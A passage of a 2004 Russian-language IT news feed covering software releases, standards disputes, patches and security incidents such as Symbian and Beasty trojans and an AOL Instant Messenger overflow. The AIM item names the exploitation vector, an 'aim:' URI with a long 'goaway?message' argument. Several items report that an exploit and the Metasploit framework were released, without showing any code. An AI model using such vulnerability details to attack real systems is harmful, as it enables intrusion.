точечные спрайты, позволяющие заменить точечные текстурные координаты текстурными координатами, интерполируемыми вокруг точки.
"Компьюлента"

15/08/2004 11:56 Третья международная PHP-конференция
23-24 сентября PHPClub совместно с Интернет агентством WebProfy проводят 3-ю международную конференцию «Современные технологии эффективной разработки веб-приложений с использованием PHP». Место проведения: Россия, г. Москва, ул. Дубосековская, д.8, ДК МАИ. В программе конференции:
* PHP5: новые возможности и рекомендации к переходу на новую версию
* Вопросы безопасности
* Хостинг PHP-приложений
* Разработка модулей (расширений) PHP на примере memcache.
* TDD - экстремальное программирование в PHP
* Работа с графикой в php
* Поиск на сайте средствами php, mysql и ispell: выбор между возможностями, качеством и производительностью
* Работа с шлюзами и системами оплаты (кредитки, WebMoney)
* Интеграция информационной системы предприятия (на базе 1С) c WEB сайтом и PHP-приложениями
* Секреты PostgreSQL
* CMF как инструмент freelance-разработки
Сайт конференции

15/08/2004 11:13 Windows Update: новая версия и смена SUS на WUS
После выхода SP2 для WinXP обновился сайт Windows Update, сообщает Bugtraq.ru. Теперь это уже 5-я версия. Изменен дизайн, устанавливается обновленный ActiveX под названием WUWebControl Class, после него загружается дополнительная программа для установки обновлений. Изменена сама процедура поиска доступных обновлений. Теперь пользователю предлагается на выбор два варианта: быстрая установка и выборочная установка. При быстрой установке загружаются и устанавливаются только критические обновления и обновления системы безопасности, при выборочной показываются все обновления. Кроме того, открыто публичное бета-тестирование новой версии служб для автоматической инсталляции обновлений с сайта Windows Update - Software Update Services (SUS). Теперь они называются Windows Update Services (WUS). Вместе с изменением названия службы претерпят существенные изменения в части функционала. WUS будет уметь обновлять не только саму операционную систему Windows, но и также программы из пакета Microsoft Office, SQL Server и другие продукты Microsoft.
Подробности

15/08/2004 10:45 Битва вокруг IEEE 802.11n продолжается - выдвинут вариант от WWiSE
Группа компаний, объединившаяся в консорциум WWiSE (World-Wide Spectrum Efficiency), объявила о намерении продвигать на стандартизацию в подгруппу разработки IEEE 802.11 Task Group N (TGn) своею версию протокола 802.11n, который, как известно, в 2005 году претендует на звание следующей версии беспроводной технологии Wi-Fi со скоростью обмена данными порядка 100 Мбит/с и более. Версия стандарта, разработанная группой WWiSE, основана на использовании прогрессивных методов уплотнения сигнала и смешанной технологии MIMO-OFDM (multiple in, multiple out). Основными участниками консорциума называют Airgo Networks, Bermai, Broadcom, Conexant Systems, Mitsubishi, Motorola, STMicroelectronics и Texas Instruments. В основу WWiSE заложены следующие основополагающие принципы:
* Обратная совместимость с нынешними 2,4 ГГц и 5 ГГц версиями стандарта Wi-Fi
* Гибкость подстройки скоростных характеристик стандарта под требования различных регионов, включая Японию
* Распространение лицензии на бесплатных (royalty-free) условиях
* 20 МГц формат канала, уже используемый в настоящее время нынешними устройствами Wi-Fi, что позволит снизить себестоимость разработки и производства устройств 802.11n
* Достижение скорости обмена данными до 135 Мбит/с за счет использования эффективной технологии MIMO-OFDM в минимальной 2x2 MIMO конфигурации при использовании одного 20 МГц канала
* Скорости обмена данными до 540 Мбит/с при использовании структуры 4x4 MIMO и ширины канала 40 МГц, что позволит стандарту развиваться в будущем
* Опция дополнительной коррекции ошибок для достижения максимального покрытия площади и пиковой скорости обмена данными.
Итак, консорциум WWiSE сделал свою заявку. Как известно, горячие деньки для подкомитета IEEE 802.11 Task Group N (TGn) по разработке нового стандарта беспроводной связи - 802.11n, начались еще в начале июня, ибо на рассмотрении у него в настоящее время находится более 60 предложений по спецификациям нового Wi-Fi стандарта, который послужит основной для скоростной беспроводной передачи потокового аудио, видео и данных для ПК и бытовой электроники.
Источник

14/08/2004 17:37 Gartner: «Сторонитесь дешевой Windows ХР»
Аналитическая фирма Gartner охарактеризовала будущую версию Microsoft Windows для развивающихся стран как продукт с хорошими намерениями, но неудачным исполнением. В опубликованном на этой неделе отчете аналитики Gartner Дайон Уиггинс и Мартин Джиллилэнд отметили, что отсутствие некоторых функций в Windows XP Starter Edition разочарует пользователей, и пришли к заключению, что ограниченные возможности апгрейда операционной системы «могут способствовать усилению пиратства». В среду Microsoft объявила о своих планах выпустить дешевую и простую в применении версию Windows ХР на рынках пяти развивающихся стран, включая Индонезию, Малайзию и Таиланд (две другие страны представители компании не назвали, но в предыдущих интервью упоминали Бразилию, Россию и Иорданию). Предназначенная для неопытных пользователей, эта операционная система будет лишена некоторых функций, таких как общий доступ к файлам и принтерам и поддержка локальных сетей. В своем отчете Gartner соглашается, что подобные функции, ориентированные на домашние сети, «малозначимы» для целевой аудитории Microsoft. Однако он критикует компанию за введение других ограничений, таких как возможность исполнять всего три прикладные программы одновременно. Кроме того, аналитическая фирма указывает на проблемы безопасности, в частности, проблему распространения исправлений и обновлений среди пользователей с медленными и дорогими каналами доступа к интернету. «Многие из тех, у кого нет собственного ПК, уже знакомы с азами работы с компьютерами по киберкафе и школе, — пишет Уиггинс, вице-президент и директор по исследованиям Gartner Research and Advisory Services. — Windows XP Starter Edition, вероятно, разочарует таких пользователей, так как ввиду наложенных ограничений не обеспечит тех же удобств». Уиггинс добавляет, что отсутствие возможности обновления Starter Edition на более полную версию означает, что пользователям вскоре захочется иметь полноценную XP Home Edition. Это может подтолкнуть их к нелегальным альтернативам и повысить уровень пиратства.
ZDNet

14/08/2004 16:26 Новый Doom стал фильмом ужасов
Знаменитая на весь мир компьютерная игра Doom пережила очередной этап эволюции - ее новая версия, по словам самих создателей, больше напоминает фильм ужасов. Первый Doom вышел в свет в 1994 году. С тех пор прошло десять лет, игра пережила уже три реинкарнации и сохранила невероятную невероятная популярность. Как и десять лет назад, игроку предстоит побороть монстров, вышедших из адовых глубин. Устаревшая версия по нынешним стандартам выглядит примитивно, однако разработчики Doom III решили возродить игрушку к жизни. В новой версии используются все возможности современных компьютерных технологий. "Там есть и бессмертные монстры и демоны", - рассказывает Тодд Холленсхед, глава id Software, компании-производителя Doom. По словам Холленсхеда, в "думских" коридорах можно встретить и зомби и страшных насекомых, херувимов, а также подводных чудовищ. Некоторые из персонажей хорошо знакомы любителям игрушки. "Мы делаем вид, что Doom и Doom 2 никогда не существовали. Эти игры были потрясающе популярны, поэтому у нас есть огромное творческое пространство", - говорит Холленсхед. Выход в свет Doom III был анонсирован еще год назад, хотя для видео игр долгий путь к финишной прямой - дело вполне обычное. Профессионалы связывают это с непростой задачей приспособления новейших технологий к нуждам геймеров. Халленсхед признается, что многие "устрашающие" элементы были взяты из таких фильмов, как, к примеру, "Чужие" - признанной классикой фильмов-ужасов. Кстати, о планах создания широкоэкранного фильма по мотивам Doom уже давно ходят слухи. Холленсхед подтвердил, что компания ведет переговоры с Universal Pictures, и он остался доволен первоначальной версией сценария. По его словам, фильм может выйти в свет через пару лет.
BBC

14/08/2004 15:21 Эксплоит уязвимости AIM
Опубликован эксплоит недавно обнаруженной уязвимости в AIM (AOL Instant Messenger). Написан для среды win32.
Эксплоит

14/08/2004 15:08 Обеспечение безопасности PHP-скриптов
На сайте Linux.com опубликована статья Майка Петерса "Securing PHP", основное назначение которой - рассказать, как можно инсталлировать довольно популярный в крайнее время язык скриптов PHP, как его подключить или в виде CGI-интерпретатора, или как модуль Apache. В статье также рассказывается, каким образом можно защитить среду PHP Оот различных видов сетевых атак при помощи модуля mod_security.
Статья

14/08/2004 14:42 Borland выпустила JBuilder 2005
Корпорация Borland Software выпустила Borland JBuilder 2005 — новую версию многоплатформенной интегрированной среды разработки для Java. Интегрированная среда разработки от Borland теперь поддерживает новые стандарты Java на разработку веб-приложений и расширяет возможности управления жизненным циклом приложений. JBuilder 2005 поддерживает анализ производительности приложений J2EE на уровне компонентов с помощью инструментов Borland Optimizeit Request Analyzer, Borland Optimizeit Profiler, Borland Optimizeit Code Coverage и Borland Optimizeit Thread Debugger. JBuilder 2005 будет поставляться для операционных систем Windows, Linux, Solaris и Mac OS X. в трех версиях:
— Borland JBuilder Enterprise для разработки приложений J2EE, веб-приложений и веб-служб;
— Borland JBuilder Developer — для code-centric разработки веб-приложений и Java-программ;
— Borland JBuilder Foundation — бесплатная среда для изучения Java и кодирования.
CNews.ru

14/08/2004 13:55 Выход ядра 2.6.8
После полуторамесячной паузы выпущено новое ядро ветви 2.6 - 2.6.8. Изменений довольно много. Заинтересованным предлагаем ознакомиться с ними лично, прочитав ChangeLog.
ChangeLog

14/08/2004 13:25 Вышла бета-версии брандмауэра Outpost Firewall Pro v 2.5
Компания "Агнитум" сообщила о выпуске бета-версии обновленной версии своего межсетевого экрана Outpost Firewall Pro. Данный программный пакет позволяет эффективно отражать атаки хакеров, контролировать сетевую активность, блокировать трояны и вирусы. От предыдущих модификаций версия Outpost Firewall Pro 2.5 будет отличается, в первую очередь, наличием поддержки второго сервис-пака для операционной системы Microsoft Windows ХР. Выпуск версии 2.5 назначен на сентябрь 2004 года. Кроме того, как отмечается в пресс-релизе "Агнитум", брандмауэр Outpost Firewall Pro 2.5 предоставляет пользователям ряд дополнительных функций, делающих связь с интернетом более безопасной.
Пресс-релиз

13/08/2004 13:57 Microsoft прольет свет на отказ городского совета Ньюхэма от Linux
Решение администрации лондонского пригорода Ньюхэм о выборе Windows вместо Linux стало большим сюрпризом. В ближайшее время Microsoft и Ньюхэм обещают подробнее рассказать об этом. В понедельник Microsoft организует пресс-конференцию, на которой расскажет об одном из наиболее вызывающих поступков в баталии между Windows и Linux — решении администрации лондонского пригорода Ньюхэм об установке инфраструктуры из настольных и серверных систем на базе Windows. Соглашение, подписанное в начале года, стало сюрпризом, так как Ньюхэм тестировал продукт open-source, которому, как ожидалось, администрация и отдаст предпочтение. Microsoft преподносит решение Ньюхэма в качестве доказательства того, что ее ПО в целом выгоднее, чем Linux. Однако в лагере open-source горячо оспаривают это утверждение, заявляя, что Microsoft, чтобы привлечь на свою сторону Ньюхэм, была вынуждена сделать значительные скидки с лицензионной платы. Делались даже предположения, что Ричард Стил, отвечающий в администрации Ньюхэма за ИКТ, постарался убедить Microsoft в неизбежности выбора Linux из-за необходимости сокращения бюджета на ИТ и тем самым спровоцировал софтверного гиганта на такое привлекательное предложение, что от него невозможно было отказаться. Если бы Ньюхэм все же предпочел Linux, это дало бы значительный толчок движению open-source и послужило источником затруднений для Microsoft.
Подробности

13/08/2004 13:56 Выход Metasploit Framework v2.2
Как любезно проинформировал широкую секьюрити-общественность H D Moore из Digitaloffense, выпущена версия 2.2 программного продукта Metasploit Framework - платформы с открытым исходным кодом для разработки эксплоитов. В новой версии - 3 интерфейса пользователя, 30 готовых эксплоитов и 40 готовых комплектов. Добавочно в этом релизе включены: новая система внедрения в память DLL, комплект для взлома VNC. Запускается в любой среде, которая имееет интерепретатор Perl. В среде Windows дополнительно подгружает Cygwin.
Страница загрузки

13/08/2004 13:16 Федеральная комиссия США по связи оградит беспроводные сети от спам
Федеральная комиссия США по связи (FCC) на днях выступила с инициативой, которая оградит от спама пользователей мобильных телефонов и карманных компьютеров (PDA). По информации газеты Washington Post, FCC предложила компаниям и агентствам новые правила, регулирующие рассылку электронных сообщений. Теперь отправители сообщений должны будут получать предварительное согласие пользователей на прием рекламных SMS и электронных писем. Кроме того, члены FCC обратились к разработчикам программного обеспечения с просьбой создать программы для борьбы с рассылкой спама в беспроводных сетях. «После введения запрета на рассылку коммерческих сообщений без согласия пользователей, американцы смогут спокойно работать со своими беспроводными устройствами», - заявил председатель FCC Майкл Пауэлл (Michael Powell). Инициатива FCC затрагивает стремительно растущий сектор электронных почтовых сервисов в беспроводных сетях. Однако под действие новых правил не попадают сообщения, переправленные на мобильные устройства с обычных почтовых серверов. Не попадают под действие закона и SMS, отправленные с мобильных телефонов. Предложение FCC расходится с антиспамерским законом, принятым американским Конгрессом в конце прошлого года. Этот акт позволяет рассылать коммерческие сообщения до тех пор, пока пользователь не заявит о своем желании отказаться от них.
Viruslist

13/08/2004 12:31 Novell объединяет дистрибутивы Linux
На осень назначен срок выпуска компанией Novell новой версии дистрибутива Linux пользовательского класса для предприятий, который объединит два варианта ОС, полученных Novell с приобретением фирм SuSE и Ximian. Предварительное название продукта - SuSE Linux Desktop. Его основа - SuSE Linux, которая интегрирована с пакетом Ximian Desktop, включающим в себя пользовательский интерфейс GNOME и набор программного обеспечения. С составом последнего в Novell пока не определились. Подтверждены планы по интеграции в SuSE Linux Desktop клона инфраструктуры .Net с открытым кодом Mono и мультимедиа-проигрывателя разработки компании RealNetWorks. Остальные компоненты, в частности браузер Mozilla, под вопросом. По словам представителя Novell, финальный продукт, скорее всего, будет носить логотип компании.
"Открытые системы"

13/08/2004 12:18 Подробности о троянской программе для Symbian OS
Стали известны подробности о троянской программе QDial26, инфицирующей портативные устройства под управлением операционной системы Symbian OS (платформа Nokia Series 60). Этот троян, обнаруженный в середине недели, прячется внутри пиратской версии игры Mosquito 2.0. При запуске приложения владельцем смартфона вредоносная программа проникает в память и начинает отправку коротких сообщений SMS на платный номер, зарегистрированный в Великобритании. Причем пользователю каждое такое послание обходится почти в три доллара США. Некоторые эксперты по вопросам сетевой безопасности предположили, что автор QDial26 получает определенный процент с каждого отосланного SMS. Однако, как оказалось, на самом деле все намного проще. Как передает ZDNet со ссылкой на заявления главы антивирусной лаборатории F-Secure Микко Хиппонена, директивы для отсылки сообщений на платный номер были прописаны в игре самими разработчиками с целью защиты приложения от нелегального копирования. Данная функция задействовалась в том случае, если пользователь приобретал дешевую версию Mosquito в другом регионе. В этом случае при запуске игра пыталась получить код для активации, связываясь с одним из платных сервисов. При этом разработчики, вероятно, не хотели причинить владельцам смартфонов какой-либо вред, поскольку информация об отправленных SMS оставалась в лог-файлах, отмечает Хиппонен. Примечательно, что впоследствии из-за многочисленных жалоб пользователей эта "защита" была отключена, однако в пиратских копиях игры, распространяющихся через файлообменные службы, она, естественно, осталась. Как бы то ни было, но сейчас пользователи "инфицированных" устройств платят только лишь за отправленные сообщения, и деньги за активацию Mosquito не взимаются.
ZDNet

13/08/2004 11:34 Описание BSD-систем
На сервере ServerWatch в разделе Tutorials выложена довольно любопытная и познавательная статья Мартина Брауна, описывающая различия в различных дистрибутивах BSD-систем. Как написано во вступлении, в настоящее время сществует 4 дистрибутива BSD: бесплатные - FreeBSD, OpenBSD, NetBSD и платный дистрибутив от Apple - Mac OS X, ядро ОС которого, как известно, было позаимствовано у FreeBSD (10.3 - у FreeBSD 5.x). О том, чем отличаются друг от друга различные дистрибутивы и посвящена статья. Наверняка будет полезна и в плане общего ознакомления с BSD-системами.
Cтатья

13/08/2004 11:15 Автор DeCSS взломал беспроводную точку доступа Apple
Двадцатилетний норвежский хакер Йон Йохансен, получивший известность после создания утилиты DeCSS для взлома защиты от копирования DVD-дисков, выложил на собственном сайте с дерзким названием So Sue Me ("Так подайте на меня в суд") свое очередное творение, cообщает "Компьюлента". На этот раз программа позволяет обойти защиту беспроводной музыкальной точки доступа AirPort Express производства компании Apple. В результате, как передает Associated Press, с AirPort Express можно работать не только через фирменное ПО Apple iTunes, но и через приложения сторонних разработчиков. Комментариев со стороны представителей Apple относительно утилиты So Sue Me пока не поступило.
Подробнее

13/08/2004 10:49 Второй сервиспак Windows XP конфликтует с чужими приложениями
По утверждениям многих пользователей второй сервиспак операционной системы Windows XP при установке конфликтует с некоторыми программами, производителем которых не является Microsoft. Как сообщает BBC News, в компании IBM в связи с этим сотрудникам запретили устанавливать обновление, пока не будет выпущена специальная версия, которая не будет мешать работать уже установленным на компьютерах приложениям. Microsoft также позволила некоторым своим корпоративным клиентам временно отключить функцию автоматической установки сервиспака, пока они не убедятся, что все в порядке. На одном из компьютерных интернет-форумов, пользователей ОС Windows XP попросили поделиться опытом установки обновления. 49 процентов из них заявили, что испытывали при инсталляции различные проблемы. Некоторые пользователи рассказали, что им пришлось полностью перекроить систему, прежде чем они смогли заставить обновление работать. Кроме того, установка сервиспака вызвала в некоторых случаях сбой настроек периферийных устройств, и их пришлось отлаживать заново. Большинство проблем, по свидетельству пользователей касается конфликтов с браузерами и приложениями других производителей программного обеспечения. Некоторые пользователи также жаловались, что на установку обновления им потребовалась до двух часов времени, при том что профессиональная версия сервиспака весит 266 мегабайт.
Lenta.Ru

12/08/2004 12:02 "Лаборатория Касперского" переходит на ежечасное обновление антивирусных баз данных
"Лаборатория Касперского" объявляет о запуске новой уникальной услуги - ежечасного выпуска обновлений антивирусных баз данных. До настоящего момента пользователи Антивируса Касперского® имели возможность загрузки свежих обновлений через сеть Интернет через каждые три часа. За последние 5 лет количество вредоносных программ, обнаруживаемых антивирусными базами "Лаборатории Касперского", выросло почти в 80 раз. При этом каждый день появляется до нескольких сотен новых вирусов. В 2000 году в базы было добавлено 63 обновления, в 2001 - 205, в 2002 - 652, в 2003 - 818, а за первые семь месяцев 2004 года выпущено уже более 1500 обновлений. Антивирусные аналитики "Лаборатории Касперского" прогнозируют, что к концу года в базы будет добавлено не менее 5000 регулярных обновлений.
"Лаборатория Касперского"

12/08/2004 11:42 Троян Beasty связывается с автором по ICQ
В Сети появилась очередная модификация вредоносной программы Beasty. После активации троян Beasty.I записывает в системную директорию Windows файлы с именами mspuep.com и mslg.blf, кроме того, копия кода под именем msdrce.com помещается непосредственно в папку Windows. Далее троян модифицирует реестр, открывает ТСР-порт 9999 и отправляет своему автору мгновенное сообщение посредством интернет-пейджера ICQ. Это послание содержит уведомление о том, что машина успешно инфицирована. При помощи Beasty.I злоумышленники могут просматривать и уничтожать файлы на компьютере-жертве, запускать приложения, загружать новые программы и выполнять другие деструктивные действия.
Описание

12/08/2004 11:15 Wi-Fi таит новые угрозы
Группа американских исследователей, проводивших изучение проблем безопасности беспроводных сетей стандарта Wi-Fi, обнаружила ряд новых уязвимостей, позволяющих злоумышленнику нарушать нормальную работу компьютера в режиме одноранговой сети (ad hoc). Несмотря на то, что подобный режим используется еще довольно редко, такая схема работы лежит в основе ряда предлагаемых перспективных методик организации обмена данными. Научный сотрудник лаборатории проблем изучения вопросов безопасности беспроводных сетей Стивенсовского Технологического Института доктор Сьюзанн Уетсел (Susanne Wetzel) опубликовала доклад, в котором сообщается о двух открытых ей способах нарушения функционирования Wi-Fi-сетей, работающих в режиме ad hoc. «Первый тип атаки позволяет злоумышленнику несанкционированно отключать часть одноранговой сети или определённые её узлы, — рассказывает г-жа Уетсел. — При этом совершенно необязательно контролировать эти узлы, нарушение их работы происходит в результате манипуляций с маршрутизацией данных. Атакуемые узлы получают множество запросов на соединение, начинают тратить больше энергии и, если они питаются от автономных источников, по прошествии некоторого времени исчезают из сети». Подобный тип воздействия на функционирование сети является разновидностью DoS-атаки. Вторая уязвимость подразумевает под собой возможность изменения злоумышленником данных, используемых для маршрутизации информационных потоков. В результате такой атаки злоумышленник получает доступ к трафику, исходящему или входящему на определённый узел, и может анализировать его. Вкупе с фильтрацией пакетов данных, подобный тип атак позволяет вывести из строя определённые маршрутизаторы, сделав их невидимыми для сети. «Эта методика позволяет злоумышленнику осуществлять удалённую „прослушку“ трафика определённого узла, при этом не находясь в пределах досягаемости для этого узла», — сообщает г-жа Уетсел. Режим аd hoc предусматривает, что устройства, входящие в одноранговую беспроводную сеть, обмениваются данными непосредственного друг с другом (как в пиринговых сетях), без использования выделенной точки доступа. Во время проведения экспериментов ученые ставили перед собой целью не столько провести успешную атаку, сколько нарушить работу сети при минимальных усилиях и с сохранением максимальной конфиденциальности. По результатам исследований группой доктора Уетсел выдвинут ряд предложений по оптимизации протоколов маршрутизации данных, в частности создание технологии сбора и обмена информации об узлах сети — своеобразное формирование репутации участников беспроводных пиринговых коммуникаций.
CNews

12/08/2004 10:48 Apple устраняет уязвимости в Mac OS
Компания Apple выпустила новые бюллетени безопасности, описывающие опасные уязвимости в различных компонентах операционных систем Mac OS X. Первая проблема связана с библиотекой libpng, которая применяется при обработке графических файлов в формате PNG (подобная уязвимость обнаружена также и в Linux). Ошибка может использоваться злоумышленниками с целью организации DoS-атак на удаленные компьютеры. Вторая уязвимость присутствует в браузере Safari и может приводить к утере пользователем персональной информации при заполнении форм в интернете. Третья уязвимость также может использоваться при организации DoS-атак и возникает при обработке компьютером с Mac OS X составленных определенным образом IP-фрагментов. Обновления для MacOS X версий 10.2.8, 10.3.5 доступны на сайте производителя.
Заплата для MacOS X 10.2.8
Заплата для MacOS X 10.3.5

12/08/2004 10:10 В Днепропетровске СБУ задержана группа хакеров
Как сообщает Служба безопасности Украины, в Днепропетровске пресечены преступные действия в сфере применения новых банковских технологий. Сотрудники управления СБ Украины в Днепропетровской области задержали двух злоумышленников, намеревавшихся похитить значительную сумму, осуществив ряд незаконных финансовых операций с использованием сети Интернет. При этом мошенники воспользовались конфиденциальной банковской информацией, к которой имел доступ один из них, будучи сотрудником финансового учреждения. По данному факту возбуждено уголовное дело по ч.2 с.362 Уголовного кодекса Украины (кража, присвоение, вымогательство компьютерной информации или завладение ею путем мошенничества или злоупотреблением служебным положением). Двое других жителей Днепропетровска, используя специальное программное обеспечение и аппаратный комплекс, получили доступ к конфиденциальной компьютерной информации провайдерской компании, прикрываясь которой, анонимно осуществляли хакерские атаки в отношении одного из банков. В результате проведения оперативно-розыскных мероприятий сотрудники спецслужбы установили злоумышленников. По факту хищения и присвоения компьютерной информации возбуждено уголовное дело по ст.362 Уголовного кодекса Украины.
СБУ

12/08/2004 09:58 AOL латает дыры в своем мессенджере
America Online (AOL) опубликовала способ как избавиться от уязвимости в мессенджере, обнаруженной месяц назад специалистами iDefense. AOL рекомендует пользователям обновить свой AIM, установив бету новой версии интернет-пейджера, релиз которой еще не вышел но ожидается в скором времени. Новая версия, как сообщает AOL, позволяет обойти данную уязвимость. Скачать ее можно, зайдя на портал AIM. Тем же, кто использует текущую версию программы, AOL рекомендукет удалить подключ 'HKEY_CLASSES_ROOTaim' из системного реестра. Данная уязвимость возникла из-за неправильной обработке длинного "Away" сообщения. Это приводило к переполнению буфера, расположенного на стеке, что позволяло выполнить произвольный код на машине жертве. Уязвимость можно было задействовать с вебсайтов спомощью специально сформированного URI вида "aim:" и длиного аргумента (около 1024 байтов) команды "goaway?message". Уязвимость подтверждена в версии 5.5.3595, более ранние версии возможно тоже уязвимы.
Vnunet

11/08/2004 14:09 Новый "троянец" разоряет владельцев смартфонов
Вскоре после появления первого концептуального вируса для смартфонов на платформе Symbian у владельцев «умных трубок» появился реальный повод для беспокойства: новый «троянец», на этот раз - совсем не безобидный, заражает их телефоны и рассылает с них текстовые сообщения на номера платных сервисов. Правда, новый вирус заражает лишь трубки любителей скачивать «халявное» ПО для смартфонов из Сети – «троянец» прячется в нелицензионной версии игры Mosquitos. По информации представителей Symbian, заражающий смартфоны «троянец» рассылает SMS на номера платных сервисов без ведома владельца, который узнает обо всем, лишь получив новый счет от оператора. Появление вирусов, поражающих ОС Symbian, предсказывалось уже давно. Немаловажную роль тут играет и тот факт, что владельцы смартфонов не подозревают о возможной опасности и сами находят вирусы, активно скачивая игры, заставки и другой контент из интернета. По словам экспертов в области инфобезопасности, наиболее вероятными жертвами «троянцев» становятся молодые люди, стремящиеся быть в курсе всех последних технологических новинок и постоянно ищущие «халявный» софт для своих трубок в Сети. Угрозу заражения вирусами они просто не воспринимают всерьез. Как говорится в заявлении представителей Symbian, размещенном на корпоративном сайте, единственный способ заразить свой смартфон вирусом - установить на него нелицензионную копию игры Mosquitos. В результате пользователю остается винить лишь самого себя – в процессе установки игры два раза появляется предупреждение системы безопасности о том, что разработчик приложения неизвестен.
CNews

11/08/2004 13:52 Microsoft выпустила заплатку для Exchange
Microsoft выпущен патч для пакета Exchange 5.5, защищающий пользователей Outlook Web Access (OWA). Уязвимость, обнаруженная в Exchange 5.5, оценена Microsoft как «представляющая умеренную опасность» (moderate). Суть её заключается в том, что злоумышленник, имеющий законную учетную запись на корпоративном Exchange-сервере, может разместить на сервере код, дающий ему доступ к любому почтовому ящику, размещенному на этой же машине. Также уязвимость позволяет недоросовестным сотрудникам подделывать содержимое веб-кэша этого сервера, произвольно изменяя информацию, содержащуюся в кэшированных файлах. Эксперты компании не считают эту брешь в защите сколько-нибудь серьезной, поскольку эксплуатация этой ошибки требует выполнения ряда важных предварительных условий: у хакера должен быть легальный аккаунт, а жертва должна предоставить ему права для доступа к своему ящику. Уязвимость, как пишет CNET, не распространяется на более современные почтовые сервера компании: Exchange 2000 и 2003, а также на Exchange 5.5, если на них не установлено приложение Outlook Web Access. Заплатку и более подробное описание проблемы можно найти на сайте Microsoft.
Подробности и патч

11/08/2004 13:28 В Афинах организована тотальная слежка
Всем, кто приедет в Афины на Олимпиаду, придётся следить за каждым своим словом. В городе установили самую совершенную в мире систему слежения за гражданами. Тысячи электронных глаз и ушей автоматически записывают и распознают всё, что видят и слышат на улицах городов. Система тотальной слежки охватывает все улицы в центре Афин, 9 портов, аэропорты и все олимпийские города. «Это очень широкая сеть, система подобного масштаба впервые развёрнута на международном уровне», — говорит представитель греческой полиции, полковник Лефтерис Иконому (Lefteris Ikonomou) в интервью AP. Камеры с микрофонами записывают разговорную речь прохожих, затем она переводится в текст с помощью ПО для распознавания речи, после чего и добавляется в поисковый индекс. Туда же попадает трафик электронной почты и изображения, циркулирующие в интернете. В июне греческое Министерство общественного порядка приняло решение включить в этот индекс ещё и расшифровки разговоров по мобильным и проводным телефонам. Поиск в индексе по ключевым словам происходит с помощью системы, разработанной британской фирмой Autonomy, чьим софтом пользуется также американское АНБ и другие спецслужбы. Система понимает все основные европейские языки, в том числе английский и греческий, а также арабский и фарси. Электронная система безопасности стоимостью $312 млн разработана совместными усилиями группы компаний под руководством американской Science Applications International Corp. В разработке участвовали немецкая Siemens, американские General Dynamics и Honeywell, израильская Elbit Systems и несколько греческих компаний. Общая стоимость, включая оборудование и установку, составила $312 млн, но эта сумма является лишь малой частью совокупных расходов на безопасность. Более полутора миллиардов долларов — вот новый рекорд Олимпийских игр.
"Вебпланета"

11/08/2004 12:10 Cтатья о настройке почтовой системы для борьбы со спамом
На сайте antispam.b2r.ru, который, как явствует из заглавной страницы, посвящён OpenBSD, выложен перевод статьи, в которой описывается построение системы фильтрации и защиты от спама на базе связки OpenBSD + Postfix + SpamAssassin + Amavisd-new + DCC + Razor + ClamAV. Система, описанная в статье, представляет собой почтовый шлюз между сетью Internet и корпоративными почтовыми серверами, такими, например, как: Lotus Domino, Microsoft Exchange server. Собственно говоря, хотя упор и делается на ОС OpenBSD, думается, методика постороения подобной системы может быть применена с использованием любой UNIX-подобной ОС.
Cтатья

11/08/2004 11:59 Армия США будет использовать ПО Citrix
Компания Citrix Systems объявила о подписании контракта на поставку ПО для армии США. Корпоративное программное обеспечение Citrix обеспечит безопасный доступ к информационным активам Департамента обороны США. Контракт подписан на срок 4 года. По его условиям Citrix получит право поставки пакета программ Citrix MetaFrame Access Suite и оказания сопутствующих консультационных услуг. Соглашение позволит централизованно осуществлять все внутриведомственные закупки ПО.
CNews

11/08/2004 11:31 ISS помогает организациям бороться с нецелевым использованием сотрудниками Интернета
Компания Internet Security Systems, Inc. (ISS) анонсировала новую услугу - предотвращение использования Интернета в личных целях сотрудниками компаний в рабочее время, сообщает infosec.ru. Основным видом злоупотребления, против которого направлена эта услуга, является несанкционированный поиск сотрудниками новой работы. Продуктивность работников значительно снижается также за счет онлайнового шопинга, "сидения" в чатах, загрузки игр и музыки, но поиск работы через Интернет, по данным исследования, проведенного компанией ISS, наносит бизнесу наибольший вред. Даже в такой благополучной стране, как США, удовлетворенность людей своей работой резко падает. По данным консалтинговой фирмы Watson Wyatt, лишь 49% граждан довольны своей работой, хотя в 1995 году этот показатель достигал почти 60%. Высокоскоростной Интернет пришел сейчас почти на каждое рабочее место, а количество сайтов для поиска вакансий растет очень быстро - на 25% в год, и множество людей тратит колоссальные ресурсы на поиск более выгодного трудоустройства, фактически воруя Интернет-трафик у своих работодателей. С этой проблемой напрямую связана и опасность потери конфиденциальных данных. Организация World Privacy Forum исследовала 70% сайтов для поиска работы и установила, что большинство из них запрашивают у посетителей важную личную информацию. Собранные таким образом данные о пользователях впоследствии используются без их санкции. Эта система быстро и точно блокирует доступ сотрудников организации к нежелательному Web-контенту. Технология фильтрации, которую использует ISS в этом продукте, комбинирует анализ текстов и изображений с поиском по крупнейшей в мире базе Web-адресов и картинок. Наличие такой базы, в частности, делает возможным блокирование Web-контента до его загрузки на компьютер пользователя. Технология компании ISS также позволяет использующей ее организации определять, кто из сотрудников и когда может иметь доступ к тому или иному контенту, а также то, какие действия должны быть предприняты в случае, если зафиксировано злоупотребление доступом в Интернет. Чтобы помочь организациям избавиться от несанкционированного использования Интернета работниками, компания ISS разработала эффективный двухшаговый процесс ознакомления потенциального заказчика с ее услугой. На первом шаге организация может использовать онлайновый механизм расчета возврата инвестиций, чтобы оценить, во что обходится ее бюджету нецелевой Web-серфинг сотрудников, и насколько быстро окупятся средства, вложенные в программное средство фильтрации контента Proventia™ Web Filter.
Описание продукта

11/08/2004 10:50 Google откупился от судебного иска Yahoo своими акциями
Корпорация Google уладила патентный спор с корпорацией Yahoo, передает The Washington Post. Это обошлось Google в 2,7 миллиона акций, стоимость которых составляет около 328 миллионов долларов. В обмен на акции Yahoo согласилась отказаться от иска против Google, рассмотрение которого продолжалось уже два года. Напомним, Yahoo обвиняла поисковую систему Google в том, что та нарушила патент Yahoo на технологию, позволяющую соотносить рекламу на страницах результатов поиска с темой запроса. В рамках достигнутого соглашения, Yahoo согласилась лицензировать эту технологию поисковой системе Google для длительного пользования.
Lenta.Ru

10/08/2004 13:37 Китай объявил войну криминальному Интернету
